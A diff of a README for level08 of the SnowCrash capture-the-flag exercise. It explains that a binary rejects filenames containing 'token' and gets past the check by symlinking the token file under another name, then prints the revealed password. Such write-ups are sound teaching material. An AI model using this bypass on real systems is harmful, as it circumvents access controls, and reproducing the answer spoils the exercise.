dfinnis/SnowCrash/level08/Ressources/README.md

 )                = 27
 exit(1 <unfinished ...>
 ```
 It seems like it calls strstr to see if "token" is contained in the filename, and rejects access if true.
-So what if we simply change the filename?
-(An alternative is to create a symlink ```ln -s token password```)
+So let's create a symlink to token, named anything other than token.
 ```
+level08@SnowCrash:~$ ln -s ~/token /tmp/password
-level08@SnowCrash:~$ mv token password level08@SnowCrash:~$ ./level08 password
+level08@SnowCrash:~$ ./level08 /tmp/password
 quif5eloekouj29ke0vouxean
 ```
 Great!
 Lets log in to flag08 and launch getflag.